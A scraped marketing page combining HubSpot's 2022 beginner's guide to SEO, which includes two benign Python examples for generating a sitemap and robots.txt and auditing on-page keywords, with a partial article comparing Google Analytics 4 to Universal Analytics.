The Ultimate Guide to SEO in 2022

What is the first thing you do when you need new marketing ideas? What about when you decide it’s time to find a new accounting software? Or even when you notice a flat tire in the car?

My guess is you turn to Google.

Impact Plus reported that 61% of marketers named SEO as a top marketing priority in 2021. And so, it’s a cold, harsh truth that without at least some presence on Google, your business faces a digital uphill battle. In this guide, you’ll discover a strategy to build your online presence — Search Engine Optimization (SEO). You’ll learn what SEO is, how it works, and what you must do to position your site in search engine results.


But before we begin, I want to reassure you of something.

So many resources make SEO complex. They scare readers with technical jargon, advanced elements, and rarely explain anything beyond theory.

I promise you, this guide isn’t like that.

I’m going to break SEO into its most basic parts and show you how to use all its elements to construct a successful SEO strategy. (And to stay up-to-date on SEO strategy and trends, check out HubSpot’s Skill Up podcast.)

Keep on reading to understand SEO, or jump ahead to the section that interests you most.

  1. What is SEO?
  2. How Google Ranks Content
  3. How to Build an SEO Strategy
  4. How to Measure SEO
  5. Local and Black Hat SEO
  6. SEO Resources

What is SEO?

SEO stands for search engine optimization. The goal of SEO is to expand a company’s visibility in organic search results. As a result, these efforts drive more visitors to the company’s website, increasing its chances for more conversions, which leads to more customers and more revenue.

When asked to explain what SEO is, I often choose to call it a strategy to ensure that when someone Googles your product or service category, they find your website.

But this simplifies the discipline a bit.

There are a ton of ways to improve the SEO of your site pages. Search engines look for elements including title tags, keywords, image tags, internal link structure, and inbound links (also known as backlinks). Search engines also look at site structure and design, visitor behavior, and other external, off-site factors to determine how highly ranked your site should be in their SERPs.

With all of these factors taken into account, SEO primarily drives two things — rankings and visibility.

How Does SEO Work?

SEO works by optimizing a website’s content, conducting keyword research, and earning inbound links to increase that content’s ranking and the website’s visibility. While you can generally see results take effect on the SERP once the webpage has been crawled and indexed by a search engine, SEO efforts can take months to fully materialize.

Rankings

This is what search engines use to determine where to place a particular web page in the SERP. Rankings run from position zero through the final search result for the query, and a web page can hold only one position at a time. As time passes, a web page’s ranking might change due to age, competition in the SERP, or algorithm changes by the search engine itself.

Visibility

This term describes how prominent a particular domain is in the search engine results. Lower search visibility occurs when a domain isn’t visible for many relevant search queries whereas with higher search visibility, the opposite is true.

Both are responsible for delivering the main SEO objectives – traffic and domain authority.

What’s the importance of SEO?

Why do SEO? Four benefits of SEO in 2022

There is one more important reason why you should be using SEO: The strategy virtually helps you position your brand throughout the entire buying journey.

In turn, SEO can ensure that your marketing strategies match the new buying behavior.

Because, as Google admitted, customer behavior has changed for good.

As of June 2021, 92% of internet searches happen on a Google property.

What’s more, they prefer going through the majority of the buying process on their own.

For example, Statista found that 60% of people research a brand online before making a purchase. What’s more, this process has never been more complicated.

Finally, DemandGen’s 2022 B2B Buyer’s Survey found that 67% of B2B buyers start the buying process with a broad web search.

But how do they use search engines during the process?

Early in the process, they use Google to find information about their problem. Some also inquire about potential solutions.

Then, they evaluate available alternatives based on reviews or social media hype before inquiring with a company. But this happens after they’ve exhausted all information sources.

And so, the only chance for customers to notice and consider you is by showing up in their search results.


How does Google know how to rank a page?

Search engines have a single goal only. They aim to provide users with the most relevant answers or information.

Every time you use them, their algorithms choose pages that are the most relevant to your query. And then, rank them, displaying the most authoritative or popular ones first.

To deliver the right information to users, search engines analyze two factors:

  • Relevancy between the search query and the content on a page. Search engines assess it by various factors like topic or keywords.
  • Authority, which is measured by a website’s popularity on the Internet. Google assumes that the more popular a page or resource is, the more valuable its content is to readers.

And to analyze all this information they use complex equations called search algorithms.

Search engines keep their algorithms secret. But over time, SEOs have identified some of the factors they consider when ranking a page. We refer to them as ranking factors, and they are the focus of an SEO strategy.

When determining relevance and authority, following the E-A-T framework can help tremendously. E-A-T in SEO stands for “expertise”, “authoritativeness”, and “trustworthiness”. And although these are not direct ranking factors, they can improve your SEO content, which in turn can affect direct ranking factors.

As you’ll shortly see, adding more content, optimizing image filenames, or improving internal links can affect your rankings and search visibility. And that’s because each of those actions improves a ranking factor.

What is SEO strategy?

An SEO marketing strategy is a comprehensive plan to get more visitors to your website through search engines. Successful SEO includes on-page strategies, which use intent-based keywords; and off-page strategies, which earn inbound links from other websites.


Three Core Components of a Strong SEO Strategy

To optimize a site, you need to improve ranking factors in three areas — technical website setup, content, and links. So, let’s go through them in turn.

1. Technical Setup

For your website to rank, three things must happen:

First, a search engine needs to find your pages on the web.

Then, it must scan them to understand their topics and identify their keywords.

And finally, it needs to add them to its index — a database of all the content it has found on the web. This way, its algorithm can consider displaying your website for relevant queries.

Seems simple, doesn’t it? Certainly, nothing to worry about. After all, since you can visit your site without any problem, so should Google, right?

Unfortunately, there is a catch. A web page looks different for you and the search engine. You see it as a collection of graphics, colors, text with its formatting, and links.

To a search engine, it’s nothing but text.

As a result, any elements it cannot render this way remain invisible to the search engine. And so, in spite of your website looking fine to you, Google might find its content inaccessible.

Let me show you an example. Here’s how a typical search engine sees one of our articles. It’s this one, by the way, if you want to compare it with the original.

[Image: The Ultimate Guide to Marketing Statistics in 2021, shown as the plain-text version of the page that Google sees when crawling the site]

Notice some things about it:

  • The page is just text. Although we carefully designed it, the only elements a search engine sees are text and links.
  • As a result, it cannot see an image on the page (note the element marked with an arrow.) It only recognizes its name. If that image contained an important keyword we’d want the page to rank for, it would be invisible to the search engine.

That’s where technical setup, also called on-site optimization, comes in. It ensures that your website and pages allow Google to scan and index them without any problems. The most important factors affecting it include:

Website navigation and links

Search engines crawl sites just like you would. They follow links. Search engine crawlers land on a page and use links to find other content to analyze. But as you’ve seen above, they cannot see images. So, set the navigation and links as text-only.

Simple URL structure

Search engines don’t like reading lengthy strings of words with a complex structure. So, if possible, keep your URLs short. Set them up to include as little as possible beyond the main keyword for which you want to optimize the page.

Page speed

Search engines use the load time — the time it takes for a user to be able to read the page — as an indicator of quality. Many website elements can affect it. Image size, for example. Use Google’s Page Speed Insights Tool for suggestions on how to improve your pages.

Dead links or broken redirects

A dead link sends a visitor to a nonexistent page. A broken redirect points to a resource that might no longer be there. Both provide poor user experience but also, prevent search engines from indexing your content.

Sitemap and Robots.txt files

A sitemap is a simple file that lists all URLs on your site. Search engines use it to identify what pages to crawl and index. A robots.txt file, on the other hand, tells search engines what content not to index (for example, specific policy pages you don’t want to appear in search.) Create both to speed up crawling and indexing of your content.
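The two files just described, as an added example (not HubSpot’s code or any real site’s files): a small Python script that writes a sitemap.xml and a robots.txt for a constructed domain and page list, then uses the standard library’s robots parser to check which paths a well-behaved crawler may fetch. The domain, paths and the policy directory kept out of search are all assumptions made for the example.

```python
"""Generate sitemap.xml and robots.txt for a small site, then check the rules.

Added example, not HubSpot's code. The domain and paths are constructed.
"""
from urllib.parse import urljoin
from urllib.robotparser import RobotFileParser
import xml.etree.ElementTree as ET

SITE = "https://www.example.com"                        # constructed sample domain
PAGES = ["/", "/blog/seo-guide", "/pricing", "/about"]  # constructed page list
# Paths we do not want crawled, e.g. the policy pages the guide mentions (constructed).
NOT_FOR_CRAWL = ["/internal-policies/", "/thank-you/"]

SITEMAP_NS = "http://www.sitemaps.org/schemas/sitemap/0.9"


def build_sitemap(site: str, paths, lastmod: str) -> str:
    """Return a sitemaps.org-format XML document listing every page URL."""
    root = ET.Element("urlset", xmlns=SITEMAP_NS)
    for path in paths:
        url = ET.SubElement(root, "url")
        ET.SubElement(url, "loc").text = urljoin(site, path)
        ET.SubElement(url, "lastmod").text = lastmod  # YYYY-MM-DD
    return '<?xml version="1.0" encoding="UTF-8"?>\n' + ET.tostring(root, encoding="unicode")


def build_robots(site: str, disallow) -> str:
    """Return a robots.txt that blocks the given path prefixes and points at the sitemap.

    robots.txt is a public file and only *asks* crawlers not to fetch a path;
    it is not access control, so anything private needs authentication, not a
    Disallow line. A blocked page can still be indexed if other sites link to
    it; keeping a page out of listings is the job of a noindex meta tag.
    """
    lines = ["User-agent: *"]
    lines += [f"Disallow: {prefix}" for prefix in disallow]
    lines.append(f"Sitemap: {urljoin(site, '/sitemap.xml')}")
    return "\n".join(lines) + "\n"


def crawl_allowed(robots_text: str, url: str, agent: str = "*") -> bool:
    """Evaluate a URL against robots.txt text the way a compliant crawler would."""
    parser = RobotFileParser()
    parser.parse(robots_text.splitlines())
    return parser.can_fetch(agent, url)


if __name__ == "__main__":
    robots = build_robots(SITE, NOT_FOR_CRAWL)
    print(build_sitemap(SITE, PAGES, "2022-01-01"))
    print(robots)
    for path in ["/pricing", "/internal-policies/privacy"]:
        print(path, "crawl allowed:", crawl_allowed(robots, urljoin(SITE, path)))
```

Write the two strings to `/sitemap.xml` and `/robots.txt` at the site root; the `Sitemap:` line in robots.txt is how crawlers discover the sitemap without you submitting it anywhere.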

Duplicate content

Pages containing identical or quite similar content confuse search engines. They often find it to be nearly impossible to display any of those pages at all. If search engines do find them, your website can be penalized. For that reason, search engines consider duplicate content as a negative factor.


2. Content

Every time you use a search engine, you’re looking for content — information on a particular issue or problem, for example.

True, this content might come in different formats. It could be text, like a blog post or a web page. But it could also be a video, product recommendation, and even a business listing.

It’s all content.

And for SEO, it’s what helps gain greater search visibility.

Here are two reasons why:

  • First, content is what customers want when searching. Regardless of what they’re looking for, it’s content that provides it. And the more of it you publish, the higher your chance for greater search visibility.
  • Also, search engines use content to determine how to rank a page. It’s the idea of relevance between a page and a person’s search query that we talked about earlier.

While crawling a page, they determine its topic. Analyzing elements like page length or its structure helps them assess its quality. Based on this information, search algorithms can match a person’s query with pages they consider the most relevant to it.

The process of optimizing content begins with keyword research.

Keyword Research

SEO is not about getting any visitors to the site. You want to attract people who need what you sell and can become leads, and later, customers.

However, that’s possible only if it ranks for the keywords those people would use when searching. Otherwise, there’s no chance they’d ever find you. And that’s even if your website appeared at the top of the search results.

That’s why SEO work starts with discovering what phrases potential buyers enter into search engines.

The process typically involves identifying terms and topics relevant to your business. Then, converting them into initial keywords. And finally, conducting extensive research to uncover related terms your audience would use.

We’ve published a thorough guide to keyword research for beginners. It lays out the keyword research process in detail. Use it to identify search terms you should be targeting.

With a list of keywords at hand, the next step is to optimize your content. SEOs refer to this process as on-page optimization.

On-Page Optimization

On-page optimization, also called on-page SEO, ensures that search engines a.) understand a page’s topic and keywords, and b.) can match it to relevant searches.

Note, I said “page” not content. That’s because, although the bulk of on-page SEO work focuses on the words you use, it extends to optimizing some elements in the code.

You may have heard about some of them — meta-tags like title or description are two most popular ones. But there are more. So, here’s a list of the most crucial on-page optimization actions to take.

Note: Since blog content prevails on most websites, when speaking of those factors, I’ll focus on blog SEO — optimizing blog posts for relevant keywords. However, all this advice is equally valid for other page types too.


a) Keyword Optimization

First, ensure that Google understands what keywords you want this page to rank. To achieve that, make sure you include at least the main keyword in the following:

  • Post’s title: Ideally, place it as close to the start of the title. Google is known to put more value on words at the start of the headline.
  • URL: Your page’s web address should also include the keyword. Ideally, including nothing else. Also, remove any stop word.
  • H1 Tag: In most content management systems, this tag displays the title of the page by default. However, make sure that your platform doesn’t use a different setting.
  • The first 100 words (or the first paragraph) of content: Finding the keyword at the start of your blog post will reassure Google that this is, in fact, the page’s topic.
  • Meta-title and meta-description tags: Search engines use these two code elements to display their listings. They display the meta-title as the search listing’s title while the meta-description provides content for the little blurb below it. But above that, they use both to understand the page’s topic further.
  • Image file names and ALT tags: Remember how search engines see graphics on a page? They can only see their file names. So, make sure that at least one of the images contains the keyword in the file name.

The alt tag, on the other hand, is text that browsers display instead of an image (for visually impaired visitors.) However, since the ALT tag resides in the image code, search engines use it as a relevancy signal as well.

Also, add semantic keywords — variations or synonyms of your keyword. Google and other search engines use them to determine a page’s relevancy better.

Let me illustrate this with a quick example. Let’s pretend that your main keyword is “Apple.” But do you mean the fruit or the tech giant behind the iPhone?

Now, imagine what happens when Google finds terms like sugar, orchard, or cider in the copy? The choice of what queries to rank it for would immediately become obvious, right?

That’s what semantic keywords do. Add them to ensure that your page doesn’t start showing up for irrelevant searches.

b) Non-Keyword-Related On-Page Optimization Factors

On-page SEO is not just about sprinkling keywords across the page. The factors below help confirm a page’s credibility and authority too:

  • External links: Linking out to other, relevant pages on the topic helps Google determine its topic further. Plus, it provides a good user experience. How? By positioning your content as a valuable resource.
  • Internal links: Those links help you boost rankings in two ways. One, they allow search engines to find and crawl other pages on the site. And two, they show semantic relations between various pages, helping search engines determine a page’s relevance to the search query better. As a rule, you should include at least 2-4 internal links per blog post.
  • Content’s length: Long content typically ranks better. That’s because, if done well, a longer blog post will always contain more exhaustive information on the topic, thus keeping a reader on your site longer. That’s called dwell time, and it’s an important ranking factor for the search engines.
  • Multimedia: Although not a requirement, multimedia elements like videos, diagrams, audio players can signal a page’s quality. It keeps readers on a page for longer just like longer content does. And in turn, it signals that they find the content valuable and worth pursuing.
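The checklist in a) and the link factors in b) are easy to verify mechanically. What follows is an added example, not HubSpot’s code or any tool the guide mentions: a Python script that parses a page the way the guide says a crawler does (text and links only, scripts and styles dropped) and reports whether the target keyword appears in the title, URL, H1, first 100 words, meta description and an image filename, which images lack alt text, and how many internal and external links the page carries. The sample HTML, URL, hostname and keyword are constructed for the example.

```python
"""Audit a page's on-page SEO signals for one target keyword.

Added example, not HubSpot's code. The sample page, URL and keyword are constructed.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class PageSignals(HTMLParser):
    """Collect the text-only view of a page: title, H1s, meta description,
    visible text, image filenames with alt text, and link targets."""

    def __init__(self):
        super().__init__()
        self.title = ""
        self.h1 = []               # completed H1 texts
        self.meta_description = ""
        self.text = []             # visible body text fragments
        self.images = []           # (filename, alt)
        self.links = []            # href values
        self._current = None       # "title" or "h1" while inside that element
        self._h1_buf = []
        self._skip = 0             # nesting depth inside <script>/<style>

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag in ("script", "style"):
            self._skip += 1
        elif tag in ("title", "h1"):
            self._current = tag
        elif tag == "meta" and (a.get("name") or "").lower() == "description":
            self.meta_description = a.get("content") or ""
        elif tag == "img":
            # A crawler sees only the filename and the alt attribute, not the picture.
            self.images.append(((a.get("src") or "").rsplit("/", 1)[-1], a.get("alt") or ""))
        elif tag == "a" and a.get("href"):
            self.links.append(a["href"])

    def handle_endtag(self, tag):
        if tag in ("script", "style"):
            self._skip -= 1
        elif tag == "h1":
            self.h1.append(" ".join("".join(self._h1_buf).split()))
            self._h1_buf = []
            self._current = None
        elif tag == "title":
            self._current = None

    def handle_data(self, data):
        if self._skip:
            return
        if self._current == "title":
            self.title += data
        elif self._current == "h1":
            self._h1_buf.append(data)
        else:
            self.text.append(data)


def audit(html: str, url: str, keyword: str, site_host: str) -> dict:
    """Return a dict of on-page checks for `keyword` on the page at `url`."""
    page = PageSignals()
    page.feed(html)
    kw = keyword.lower()
    slug_kw = kw.replace(" ", "-")               # how the keyword looks in a URL or filename
    words = " ".join(page.text).split()
    first_100 = " ".join(words[:100]).lower()
    internal = external = 0
    for href in page.links:
        host = urlparse(href).netloc
        if host == "" or host == site_host:      # relative links count as internal
            internal += 1
        else:
            external += 1
    return {
        "keyword_in_title": kw in page.title.lower(),
        "keyword_in_url": slug_kw in urlparse(url).path.lower(),
        "keyword_in_h1": any(kw in h.lower() for h in page.h1),
        "keyword_in_first_100_words": kw in first_100,
        "keyword_in_meta_description": kw in page.meta_description.lower(),
        "keyword_in_image_filename": any(slug_kw in name.lower() for name, _ in page.images),
        "images_missing_alt": [name for name, alt in page.images if not alt.strip()],
        "internal_links": internal,
        "external_links": external,
        "word_count": len(words),
    }


# Constructed sample page for the demo; not a real site.
SAMPLE_URL = "https://www.example.com/blog/keyword-research"
SAMPLE_HTML = """<!doctype html>
<html><head>
<title>Keyword Research Guide for Beginners</title>
<meta name="description" content="Learn keyword research step by step.">
<style>body{color:#333}</style>
</head><body>
<h1>Keyword <strong>Research</strong> Guide</h1>
<p>Keyword research is the first step of on-page SEO. This guide walks through
choosing the terms your buyers actually type into a search engine.</p>
<img src="/img/keyword-research-process.png" alt="Keyword research process diagram">
<img src="/img/hero.jpg">
<p>See our <a href="/blog/on-page-seo">on-page SEO checklist</a>,
<a href="/blog/link-building">link building guide</a> and
<a href="https://developers.google.com/search/docs">Google's search docs</a>.</p>
<script>console.log("keyword research");</script>
</body></html>"""

if __name__ == "__main__":
    for check, result in audit(SAMPLE_HTML, SAMPLE_URL, "keyword research", "www.example.com").items():
        print(f"{check:30} {result}")
```

Run it against a page fetched from your own site to get the same report; the `images_missing_alt` list is the quickest win, since an image without alt text contributes nothing to the text-only view a crawler works from.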

3. Links

From what you’ve read in this guide so far, you know that no page will rank without two factors — relevance and authority.

In their quest to provide users with the most accurate answers, Google and other search engines prioritize pages they consider the most relevant to their queries but also, popular.

The first two areas — technical setup and content — focused on increasing relevance (though I admit, some of their elements can also help highlight the authority.)

Links, however, are responsible for popularity.

But before we talk more about how they work, here’s what SEOs mean when talking about links.

What is a backlink?

Links, also called backlinks, are references to your content on other websites. Every time another website mentions and points their readers to your content, you gain a backlink to your site.

For example, this article in Entrepreneur.co mentions our Not Another State of Marketing Report page. It also links to it allowing their readers to see other stats than the one quoted.

[Image: An example of a backlink from entrepreneur.com to HubSpot's Not Another State of Marketing Report]

Google uses the quantity and quality of links like this as a signal of a website’s authority. The logic behind this is that webmasters would reference a popular and high-quality website more often than a mediocre one.

But note that I mentioned link quality as well. That’s because not all links are the same. Some — low-quality ones — can impact your rankings negatively.

Links Quality Factors

Low quality or suspicious links — for example, ones that Google would consider as built deliberately to make it consider a site as more authoritative — might reduce your rankings.

That’s why, when building links, SEOs focus not on building any links. They aim to generate the highest quality references possible.

Naturally, just like with the search algorithm, we don’t know what factors determine a link’s quality, specifically. However, over time, SEOs discovered some of them:

  • The popularity of a linking site: Any link from a domain that search engines consider an authority will naturally have high quality. In other words, links from websites that have good quality links pointing to them will yield better results.
  • Topic relevance: Links from domains on a topic similar to yours will carry more authority than those from random websites.
  • Trust in a domain: Just like with popularity, search engines also assess a website’s trust. Links from more trustworthy sites will always impact rankings better.

Link Building

In SEO, we refer to the process of acquiring new backlinks as link building. And as many practitioners admit, it can be a challenging activity.

Link building, if you want to do it well, requires creativity, strategic thinking, and patience. To generate quality links, you need to come up with a link building strategy. And that’s no small feat.

Remember, your links must pass various quality criteria. Plus, it can’t be obvious to search engines that you’ve built them deliberately.

Here are some strategies to do it:

  • Editorial, organic links: These backlinks come from websites that reference your content on their own.
  • Outreach: In this strategy, you contact other websites for links. This can happen in many ways. You could create an amazing piece of content, and email them to tell them about it. In turn, if they find it valuable, they’ll reference it. You can also suggest where they could link to it.
  • Guest posting: Guest posts are blog articles that you publish on third-party websites. In turn, those companies often allow including one or two links to your site in the content and author bio.
  • Profile links: Many websites offer an opportunity to create a link. Online profiles are a good example. Often, when setting up such a profile, you can also list your website there. Not all such links carry strong authority, but some might. And given the ease of creating them, they’re worth pursuing.
  • Competitive analysis: Finally, many SEOs regularly analyze their competitors’ backlinks to identify those they could recreate for their sites too.

Now, if you’re still here with me, then you’ve just discovered what’s responsible for your site’s success in search.

The next step, then, is figuring out whether your efforts are working.

How to Monitor & Track SEO Results

Technical setup, content, and links are critical to getting a website into the search results. Monitoring your efforts helps improve your strategy further.

Measuring SEO success means tracking data about traffic, engagement, and links. And though, most companies develop their own sets of SEO KPIs (key performance indicators), here are the most common ones:

  • Organic traffic growth
  • Keyword rankings (split into branded and non-branded terms)
  • Conversions from organic traffic
  • Average time on page and the bounce rate
  • Top landing pages attracting organic traffic
  • Number of indexed pages
  • Links growth (including new and lost links)

Local SEO

Up until now, we focused on getting a site to rank in search results in general. If you run a local business, however, Google also lets you position it in front of potential customers in your area, specifically. But for that, you use local SEO.

And it’s well worth it.

46% of Google searches are for local businesses. They look for vendor suggestions, and even specific business addresses.

What’s more, they act on this information: 72% of searchers visit a local store or company’s premises within 24 hours of the search.

But hold on, is local SEO different from what we’ve been talking about all along?

Yes and no.

Search engines follow similar principles for both local and global rankings. But given that they position a site for specific, location-based results, they need to analyze some other ranking factors too.

Even local search results look different:

  • They appear only for searches with a local intent (for example, “restaurant near me” or when a person clearly defined the location.)
  • They contain results specific to a relevant location.
  • They concentrate on delivering specific information to users that they don’t need to go anywhere else to find.
  • They target smartphone users primarily as local searches occur more often on mobile devices.

For example, a localpack, the most prominent element of local results, includes almost all information a person would need to choose a business. Here are local results Google displays for the phrase “best restaurant in Boston.”

[Image: Local SEO example of a local pack featured snippet in the SERP]

Note that these results contain no links to any content. Instead, they include a list of restaurants in the area, a map to show their locations, and additional information about each:

  • Business name
  • Description
  • Image
  • Opening hours
  • Star Reviews
  • Address

Often, they also include a company’s phone number or website address.

All this information combined helps customers choose which business to engage. But it also allows Google to determine how to rank it.

Local Search Ranking Factors

When analyzing local websites, Google looks at the proximity to a searcher’s location. With the rise of local searches containing the phrase, “near me,” it’s only fair that Google will try to present the closest businesses first.

Keywords are essential for local SEO too. However, one additional element of on-page optimization is the presence of a company’s name, address, and phone number on a page. In local SEO, we refer to it as the NAP.

Again, it makes sense, as the search engine needs a way to assess the company’s location.

Google assesses authority in local search not just by links. Reviews and citations (references of a business’s address or a phone number online) highlight its authority too.

Finally, the information a business includes in Google My Business — the search engine’s platform for managing local business listings — plays a huge part in its rankings.

The above is just the tip of the iceberg. But they are the ones to get right first if you want your business to rank well in local search.

What is black hat SEO?

The final aspect of SEO I want to highlight to you is something I also hope you’ll never get tempted to use. I mean it.

Because, although it might have its lure, using black hat SEO typically ends in a penalty from search listings.

Black hat practices aim at manipulating search engine algorithms using strategies against search engine guidelines. The most common black hat techniques include keyword stuffing, cloaking (hiding keywords in code so that users don’t see them, but search engines do), and buying links.

So, why would someone use black hat SEO? For one, because, often, ranking a site following Google’s guidelines takes time. Long time, in fact.

Black hat strategies let you cut down the complexity of link building, for example. Keyword stuffing helps users to rank one page for many keywords, without having to create more content.

But as said, getting caught often results in a site being completely wiped out from search listings.

And the reason I mention it here is that I want you to realize that there are no shortcuts in SEO. And be aware of anyone suggesting strategies that might seem too good to be true.

Should you outsource SEO or keep it in-house?

Whether you work on SEO yourself, delegate it to another team member, or outsource it completely, you’ll want to make this decision with as much knowledge as possible.

Doing SEO Yourself

Be honest with yourself — are you interested in learning SEO? Do you have time to learn the basics? Do you have the resources to bring in help if you redesign your website and accidentally deindex several pages? If the answer to any of these questions is “no,” then you might not want to take on the responsibility of SEO yourself. SEO is a long term play, and just like a muscle, you have to work at it consistently to see results. That can take a substantial amount of commitment. If you have any doubts, try the next best thing — delegating the work.

Delegate SEO to a Team Member

If you’re not quite sure about taking on SEO yourself, consider delegating the work to a team member. If you have a person who’s interested in growth marketing, development, or even web design, this would be a valuable skill to help grow their career. You could also hire a full-time search engine optimization specialist if you have the budget.

The person in this role can report to the marketing team, development team, or even design team. Because SEO touches nearly every function of a business while maintaining a unique set of skill requirements, this position won’t be subject to frequent changes if departments need to be restructured later on. The person you delegate to this job will contribute cross functionally more often than not, so you’ll have some liberty with managing them.

Outsource SEO to an Agency

You don’t have the interest in SEO, your team’s at full capacity, and you can’t spare the budget to fill a full time SEO role. Now what? The best bang for your buck is to outsource SEO to a reputable consultant. Why? First, a well-respected SEO consultant is highly skilled in bringing organic traffic, leads, and conversions to businesses. They do this day in and day out, so they won’t need the ramp up time that you or a member of your team would need in order to learn the basics.

Second, a consultant can be less expensive than hiring someone full-time for the role because they don’t require insurance benefits, payroll taxes, etc. But how much exactly would you be looking at for outsourcing your SEO?

SEO can cost between $100 and $500 per month if you do it yourself with a keyword research tool. It can cost between $75 and $150 per hour for a consultant, and up to $10,000 per month if you hire a full-service marketing agency. Small businesses generally spend less on SEO than big brands, so be sure to take that into account.

Incurring SEO costs can mean one of two things: the investment in your organic search strategy, or how much you pay for paid search engine marketing (SEM) services like Google Ads. If you’re paying for a tool, consultant, or marketing agency to help you optimize your web content, your bill can vary wildly with the depth of the services you’re receiving.

SEO Resources & Training

This guide is just a starting point for discovering SEO. But there’s much more to learn.

Here are online training resources to try next if you or someone on your team wants to take on this skill:

You can also pick SEO knowledge from industry experts and their blogs. Here are some worth reading:

Over To You

Without actively positioning its content in search results, no business can survive long.

By increasing your search visibility, you can bring more visitors, and in turn, conversions and sales. And that’s well worth the time spent becoming an expert in SEO.

Editor’s note: This post was originally published in November 2019 and has been updated for comprehensiveness.


Source: https://blog.hubspot.com/marketing/seo

Google Analytics 4 vs Universal Analytics: Full Comparison 2022

Do you want to know what’s new in Google Analytics 4? How is GA4 different from Universal Analytics?

There’s a lot that’s changed in the new Google Analytics 4 platform including the navigation. Google has added new features and removed a number of reports you’re familiar with. And that means we’ll need to relearn the platform.

In this guide, we’ll detail the differences between Google Analytics 4 (GA4) vs. Universal Analytics (UA) so that you’re prepared to make the switch.

If you haven’t already switched to Google Analytics 4, we have an easy step-by-step guide you can follow: How to Set Up Google Analytics 4 in WordPress.

What’s New Only in Google Analytics 4?

In this section, we’re detailing the things that are new in GA4 that aren’t present in Universal Analytics at all. A little later, we’ll go into depth about all the changes you need to know about.

  1. Creating and Editing Events: GA4 brings about a revolutionary change in the way you track events. You can create a custom event and modify events right inside your GA4 property. This isn’t possible with Universal Analytics unless you write code to create a custom event.
  2. Conversion Events: Conversion goals are being replaced with conversion events. You can simply mark or unmark an event to start tracking it as a conversion. There’s an easy toggle switch to do this. GA4 even lets you create conversion events ahead of time before the event takes place.
  3. Data Streams: UA lets you connect your website’s URL to a view. These views let you filter data. So for instance, you can create a filter in a UA view to exclude certain IP addresses from reports. GA4 uses data streams instead of views.
  4. Data filters: Now you can add data filters to include or exclude internal and developer traffic from your GA4 reports.
  5. Google Analytics Intelligence: You can delete search queries from your search history to fine-tune your recommendations.
  6. Explorations and Templates: There’s a new Explore item in the menu that takes you to the Explorations page and Template gallery. Explorations give you a deeper understanding of your data. And there are report templates that you can use.
  7. Debug View: There’s a built-in visual debugging tool which is awesome news for developers and business owners. With this mode, you can get a real-time view of events displayed on a vertical timeline graph. You can see events for the past 30 minutes as well as the past 60 seconds.
  8. BigQuery linking: You can now link your GA4 account with your BigQuery account. This will let you run business intelligence tasks on your analytics property using BigQuery tools.

While this is what’s unique to GA4, there are a lot more changes than this. But first, let’s take a look at what’s gone from the Universal Analytics platform that we’re all familiar with.

What’s Missing in Google Analytics 4?

Google Analytics 4 has done away with some of the old concepts. These include:

  1. Views and Filters: As we mentioned, GA4 now uses Data Streams instead of views, which we explain in depth a bit later. So you won’t be able to create a view and related filters. Once you convert your UA property to GA4, you’ll be able to access a read-only list of UA filters under Admin > Account > All Filters.
  2. Customization (menu): UA properties have a customization menu for options to create dashboards, create custom reports, save existing reports, and create custom alerts. Below are the UA customization options, along with their GA4 equivalent.
    • Dashboards: At the time of writing this, there isn’t a way to create a custom GA4 dashboard.
    • Custom reports: GA4 has the Explorations page instead where you can create custom reports.
    • Saved reports: When you create a report in Explorations, it is automatically saved for you.
    • Custom alerts: Inside custom Insights, which is a new feature in GA4, you can set custom alerts.
  3. Google Search Console linking: There isn’t a way to link Google Search Console with a GA4 property at the time of writing.
  4. Bounce rate: One of the most tracked metrics – the bounce rate – is gone. It’s likely that this has been replaced with Engagement Metrics.
  5. Conversion Goals: In UA, you could create conversion goals under Views. But since views are gone, so are conversion goals. However, you can create conversion events to essentially track the same thing.

Now that you know what’s new and what’s missing in GA4, we’ll take you through an in-depth tour of the new GA4 platform.

Google Analytics 4 vs Universal Analytics

Below, we’ll be covering the main differences between GA4 and UA. We’ve created this table of contents for you to easily navigate the comparison guide:

Feel free to use the quick links to skip ahead to the section that interests you the most.

New Mobile Analytics

A major difference between GA4 and UA is that the new GA4 platform will also support mobile app analytics.

In fact, it was originally called “Mobile + Web”.

UA only tracked web analytics so it was difficult for businesses with apps to get an accurate outlook on their performance and digital marketing efforts.

Now with GA4 data model, you’ll be able to track both your website and app. You can set up a data stream for Android and iOS.

[Screenshot: GA4 data streams]

There’s also added functionality to create custom campaigns to collect information about which mediums/referrals are sending you the most traffic. This will show you where your campaigns get the most traction so that you can optimize your strategies in the future.

Easy User ID Tracking

Turning on user ID tracking in UA was quite a task. But that’s all been simplified in GA4 with the new measurement model. You simply need to navigate to Admin » Property Settings » Reporting Identity tab.

[Screenshot: Reporting identity settings in GA4]

You can choose between Blended and Observed mode. Select the one you want and save your changes. That’s it.

In GA4, the reporting interface remains familiar and the navigation menu is still on the left. But quite a few menu items have changed.

First, there are only 4 high-level menu items right now. Google may add more as the platform is further developed.

[Screenshot: GA4 main menu]

Next, each menu item has a collapsed view. You can expand each item by clicking on it.

Now when you click on the submenu items, it will expand the menu to reveal more sub menus.

[Screenshot: Submenu in GA4]

In GA4, you’ll see familiar menu items you use for SEO and other purposes but in different locations. Here are the notable changes:

  • Realtime is under Reports
  • Audience(s) is under Configure
  • Acquisition is under Reports » Life cycle
  • Conversions is under Configure

GA4 also comes with completely new menu items as listed below:

  • Reports snapshot
  • Engagement
  • Monetization
  • Retention
  • Library
  • Custom definitions
  • DebugView

Measurement ID vs Tracking ID

Universal Analytics uses a Tracking ID that has a capital UA, a hyphen, a 7-digit tracking code followed by another hyphen, and a number. Like this: UA-1234567-1.

The last number is a sequential number starting from 1 that maps to a specific property in your Google Analytics account. So if you set up a second Google Analytics property, the new code will change to UA-1234567-2.

You can find the Tracking ID for a Universal Analytics property under Admin » Property column. Navigate to Property Settings » Tracking ID tab where you can see your UA tracking ID.

In GA4, you’ll see a Measurement ID instead of a Tracking ID. It starts with a capital G, followed by a hyphen and a 10-character code.

[Screenshot: GA4 stream Measurement ID]

It would look like this: G-SV0GT32HNZ.

To find your GA4 Measurement ID, go to Admin » Property » Data Streams. Click on a data stream. You’ll see your Measurement ID in the stream details after the Stream URL and Stream Name.

Data Streams vs Views

In UA, you could connect your website’s URL to a view. UA views are mostly used to filter data. So for instance, you can create a filter in a UA view to exclude certain IP addresses from reports.

GA4 uses data streams instead. You’ll need to connect your website’s URL to a data stream.

But don’t be mistaken, they are not the same as views.

